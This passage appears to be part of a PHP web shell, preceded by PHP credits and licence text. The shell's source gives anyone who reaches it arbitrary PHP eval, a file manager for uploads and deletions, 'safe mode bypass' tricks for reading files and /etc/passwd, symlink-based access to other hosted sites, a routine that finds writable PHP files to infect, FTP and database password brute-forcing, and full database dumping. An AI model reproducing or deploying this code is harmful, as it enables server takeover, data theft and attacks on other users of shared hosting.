DB-LIB (MS SQL, Sybase) Wez Furlong, Frank M. Kromann, Adam Baratz
DBA Sascha Schumann, Marcus Boerger
DOM Christian Stocker, Rob Richards, Marcus Boerger
enchant Pierre-Alain Joye, Ilia Alshanetsky
EXIF Rasmus Lerdorf, Marcus Boerger
fileinfo Ilia Alshanetsky, Pierre Alain Joye, Scott MacVicar, Derick Rethans, Anatol Belski
Firebird driver for PDO Ard Biesheuvel
FTP Stefan Esser, Andrew Skalski
GD imaging Rasmus Lerdorf, Stig Bakken, Jim Winstead, Jouni Ahto, Ilia Alshanetsky, Pierre-Alain Joye, Marcus Boerger
GetText Alex Plotnick
GNU GMP support Stanislav Malyshev
Iconv Rui Hirokawa, Stig Bakken, Moriyoshi Koizumi
IMAP Rex Logan, Mark Musone, Brian Wang, Kaj-Michael Lang, Antoni Pamies Olive, Rasmus Lerdorf, Andrew Skalski, Chuck Hagenbuch, Daniel R Kalowsky
Input Filter Rasmus Lerdorf, Derick Rethans, Pierre-Alain Joye, Ilia Alshanetsky
InterBase Jouni Ahto, Andrew Avdeev, Ard Biesheuvel
Internationalization Ed Batutis, Vladimir Iordanov, Dmitry Lakhtyuk, Stanislav Malyshev, Vadim Savchuk, Kirti Velankar
JSON Jakub Zelenka, Omar Kilani, Scott MacVicar
LDAP Amitay Isaacs, Eric Warnke, Rasmus Lerdorf, Gerrit Thomson, Stig Venaas
LIBXML Christian Stocker, Rob Richards, Marcus Boerger, Wez Furlong, Shane Caraveo
Multibyte String Functions Tsukada Takuya, Rui Hirokawa
MySQL driver for PDO George Schlossnagle, Wez Furlong, Ilia Alshanetsky, Johannes Schlueter
MySQLi Zak Greant, Georg Richter, Andrey Hristov, Ulf Wendel
MySQLnd Andrey Hristov, Ulf Wendel, Georg Richter, Johannes Schlüter
OCI8 Stig Bakken, Thies C. Arntzen, Andy Sautins, David Benson, Maxim Maletsky, Harald Radi, Antony Dovgal, Andi Gutmans, Wez Furlong, Christopher Jones, Oracle Corporation
ODBC driver for PDO Wez Furlong
ODBC Stig Bakken, Andreas Karajannis, Frank M. Kromann, Daniel R. Kalowsky
Opcache Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Dmitry Stogov, Xinchen Hui
OpenSSL Stig Venaas, Wez Furlong, Sascha Kettler, Scott MacVicar
Oracle (OCI) driver for PDO Wez Furlong
pcntl Jason Greene, Arnaud Le Blanc
Perl Compatible Regexps Andrei Zmievski
PHP Archive Gregory Beaver, Marcus Boerger
PHP Data Objects Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky
PHP hash Sara Golemon, Rasmus Lerdorf, Stefan Esser, Michael Wallner, Scott MacVicar
Posix Kristian Koehntopp
PostgreSQL driver for PDO Edin Kadribasic, Ilia Alshanetsky
PostgreSQL Jouni Ahto, Zeev Suraski, Yasuo Ohgaki, Chris Kings-Lynne
Pspell Vlad Krupin
Readline Thies C. Arntzen
Recode Kristian Koehntopp
Reflection Marcus Boerger, Timm Friebe, George Schlossnagle, Andrei Zmievski, Johannes Schlueter
Sessions Sascha Schumann, Andrei Zmievski
Shared Memory Operations Slava Poliakov, Ilia Alshanetsky
SimpleXML Sterling Hughes, Marcus Boerger, Rob Richards
SNMP Rasmus Lerdorf, Harrie Hazewinkel, Mike Jackson, Steven Lawrance, Johann Hanne, Boris Lytochkin
SOAP Brad Lafountain, Shane Caraveo, Dmitry Stogov
Sockets Chris Vandomelen, Sterling Hughes, Daniel Beulshausen, Jason Greene
Sodium Frank Denis
SPL Marcus Boerger, Etienne Kneuss
SQLite 3.x driver for PDO Wez Furlong
SQLite3 Scott MacVicar, Ilia Alshanetsky, Brad Dewar
System V Message based IPC Wez Furlong
System V Semaphores Tom May
System V Shared Memory Christian Cartus
tidy John Coggeshall, Ilia Alshanetsky
tokenizer Andrei Zmievski, Johannes Schlueter
WDDX Andrei Zmievski
XML Stig Bakken, Thies C. Arntzen, Sterling Hughes
XMLReader Rob Richards
xmlrpc Dan Libby
XMLWriter Rob Richards, Pierre-Alain Joye
XSL Christian Stocker, Rob Richards
Zip Pierre-Alain Joye, Remi Collet
Zlib Rasmus Lerdorf, Stefan Roehrich, Zeev Suraski, Jade Nicoletti, Michael Wallner
PHP Documentation
Authors Mehdi Achour, Friedhelm Betz, Antony Dovgal, Nuno Lopes, Hannes Magnusson, Philip Olson, Georg Richter, Damien Seguy, Jakub Vrana, Adam Harvey
Editor Peter Cowburn
User Note Maintainers Daniel P. Brown, Thiago Henrique Pojda
Other Contributors Previously active authors, editors and other contributors are listed in the manual.
PHP Quality Assurance Team
Ilia Alshanetsky, Joerg Behrens, Antony Dovgal, Stefan Esser, Moriyoshi Koizumi, Magnus Maatta, Sebastian Nohn, Derick Rethans, Melvyn Sopacua, Jani Taskinen, Pierre-Alain Joye, Dmitry Stogov, Felipe Pena, David Soria Parra, Stanislav Malyshev, Julien Pauli, Stephen Zarkos, Anatol Belski, Remi Collet, Ferenc Kovacs
Websites and Infrastructure team
PHP Websites Team Rasmus Lerdorf, Hannes Magnusson, Philip Olson, Lukas Kahwe Smith, Pierre-Alain Joye, Kalle Sommer Nielsen, Peter Cowburn, Adam Harvey, Ferenc Kovacs, Levi Morrison
Event Maintainers Damien Seguy, Daniel P. Brown
Network Infrastructure Daniel P. Brown
Windows Infrastructure Alex Schoenmaker

PHP License

This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file: LICENSE

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

If you did not receive a copy of the PHP license, or have any questions about PHP licensing, please contact license@php.net.

; $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '</div>
'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '

Execution PHP-code

<div class=content>
<textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX
<pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; printFooter();}// PHP end --------------------// File manager go --------------------function actionFilesMan() { printHeader(); echo '

File manager

<div class=content>'; if(isset($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_SESSION['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']); } elseif($_SESSION['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION['f'] as $f) @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); } unset($_SESSION['f']); break; default: if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['cwd'] = @$_POST['c']; } break; } echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>'; } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!'; return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); }<script> function sa() { for(i=0;i<document.files.elements.length;i++) if(document.files.elements[i].type == 'checkbox') document.files.elements[i].checked = document.files.elements[0].checked; }</script><table width='100%' class='main' cellspacing='0' cellpadding='2'>
echo "<th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th>"; $dirs = $files = $links = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'].$dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) $links[] = array_merge($tmp, array('type' => 'link')); elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); usort($links, "cmp"); $files = array_merge($dirs, $links, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');">[ '.htmlspecialchars($f['name']).' ]').'</a>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].'<a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'<a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').''; $l = $l?0:1; } <td colspan=7> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='=htmlspecialchars($GLOBALS['cwd'])'> <input type=hidden name=charset value='=isset($_POST['charset'])?$_POST['charset']:'''> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option> if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){<option value='paste'>Paste</option> }</select>&nbsp;>">
</div> printFooter();}// File manager end --------------------// String tools go --------------------function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0; printHeader(); echo '

String conversions

<div class=content>'; echo "
<select name='selectTool'>"; foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX
<textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea>
<pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo"</pre></div>

Search files:

<div class=content>
<table cellpadding='1' cellspacing='0' width='50%'> <td width='1%'>Text:<input type='text' name='text' style='width:100%'> Path:<input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'> Name:<input type='text' name='filename' value='*' style='width:100%'> <input type='submit' value='>>'>
"; function printRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) printRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a>
"; } } } } if(@$_POST['p3']) printRecursiveGlob($_POST['c']); echo "</div>

Search for hash:

<div class=content>
<input type='text' name='hash' style='width:200px;'>
<input type='hidden' name='act' value='find'/> <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\">
<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\">
<input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\">
<input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\">
<input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\">
<input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\">
<input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\">
</div>"; printFooter();}// String tools end --------------------// Safe mode go ------------------------function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); printHeader(); echo '

Safe mode bypass

<div class=content>'; echo '<span>Copy (read file)</span>
<input type=text name=param><input type=submit value=">>">

<span>Glob (list dir)</span>
<input type=text name=param><input type=submit value=">>">

<span>Curl (read file)</span>
<input type=text name=param><input type=submit value=">>">

<span>Ini_restore (read file)</span>
<input type=text name=param><input type=submit value=">>">

<span>Posix_getpwuid ("Read" /etc/passwd)</span>
From<input type=text name=param1 value=0>
To<input type=text name=param2 value=1000>
<input type=submit value=">>">

<span>Imap_open (read file)</span>
<input type=text name=param><input type=submit value=">>">
'; if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; echo '</div>'; printFooter();}// Safe mode end ---------------------// Logout go -------------------------function actionLogout() { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo 'bye!';}// Logout end -------------------------// Suicide go -------------------------function actionSelfRemove() { printHeader(); if($_POST['p1'] == 'yes') { if(@unlink(SELF_PATH)) die('Shell has been removed'); else echo 'unlink error!'; } echo '

Suicide

<div class=content>Really want to remove the shell?
<a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; printFooter();}// Suicide end -------------------------function actionTools() { printHeader(); printFooter();}// Domains go -------------------------function actionDomains() { printHeader(); error_reporting(0);#Domains & Usersecho "<title>#Domains & Users</title>";mkdir("sym");symlink("/","0/x.txt");$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";$f = fopen ('sym/.htaccess','w'); fwrite($f , $c); $d0mains = @file("/etc/named.conf");if(!$d0mains){ die("#Error... -> [ /etc/named.conf ]"); }echo "<table align=center border=1><tr bgcolor=teal>DomainUser List Symlink";foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a>".$user['name']."<a href='sym/x.txt/home/".$user['name']."/public_html'>Miremos</a>"; flush();}}}echo " <p align='center'> FailRoot'Cod3rz <a href='http://failroot.wordpress.com/'>FailRoot-Sec.Com</a> | <a href='http://wWw.sEc4EvEr.CoM/'>wWw.sEc4EvEr.CoM</a>
</p> "; printFooter();}// Domains end -----------------------// Infect go -------------------------function actionInfect() { printHeader(); echo '

Infect

<div class=content>'; if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT']; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file
"; $i++; } } } echo "<font color=red size=14>$i</font>"; }else{ echo "
<input type=submit value=Infect name=infet>
"; echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>'; } printFooter();}// Infect end -----------------------// Bruteforce go --------------------function actionBruteforce() { printHeader(); if( isset($_POST['proto']) ) { echo '

Results

<div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''"; $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div>
"; } echo '

FTP bruteforce

<div class=content>' .'' .'' .'' .'' .'' .'' .'' .'' .'' .'
<span>Type</span><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select>
' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<span>Server:port</span><input type=text name=server value="127.0.0.1">
<span>Brute type</span><label><input type=radio name=type value="1" checked> /etc/passwd</label>
<label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label>
<label><input type=radio name=type value="2"> Dictionary</label>
<table style="padding-left:15px">
<span>Login</span><input type=text name=login value="root">
<span>Dictionary</span><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic">
' .'<input type=submit value=">>">'; echo '</div>
'; printFooter();}// Bruteforce end --------------------// Sql go ----------------------------function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->res = @mysql_list_dbs($this->link); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error($this->link); break; case 'pgsql': return @pg_last_error($this->link); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'mysql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function dump($table) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); echo $create[1].";\n\n"; $this->query('SELECT * FROM `'.$table.'`'); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; } break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { ob_start("ob_gzhandler", 4096); $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } printHeader();

Sql browser

<div class=content>
<table cellpadding="2" cellspacing="0"> Type Host Login Password Database <input type=hidden name=a value=Sql> <input type=hidden name=p1 value='query'> <input type=hidden name=p2> <input type=hidden name=c value='=htmlspecialchars($GLOBALS['cwd']);'> <input type=hidden name=charset value='=isset($_POST['charset'])?$_POST['charset']:'''> <select name='type'> <option value="mysql" if(@$_POST['type']=='mysql')echo 'selected';>MySql</option> <option value="pgsql" if(@$_POST['type']=='pgsql')echo 'selected';>PostgreSql</option> </select> <input type=text name=sql_host value='=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));'> <input type=text name=sql_login value='=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));'> <input type=text name=sql_pass value='=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));'> $tmp = "<input type=text name=sql_base value=''>"; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while($item = $db->fetch()) { list($key, $value) = each($item); echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; } echo '</select>'; } else echo $tmp; }else echo $tmp; <input type=submit value=">>"> <script> function st(t,l) { document.sf.p1.value = 'select'; document.sf.p2.value = t; if(l!=null)document.sf.p3.value = l; document.sf.submit(); } function is() { for(i=0;i<document.sf.elements['tbl[]'].length;++i) document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked; } </script> if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo "<td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span>

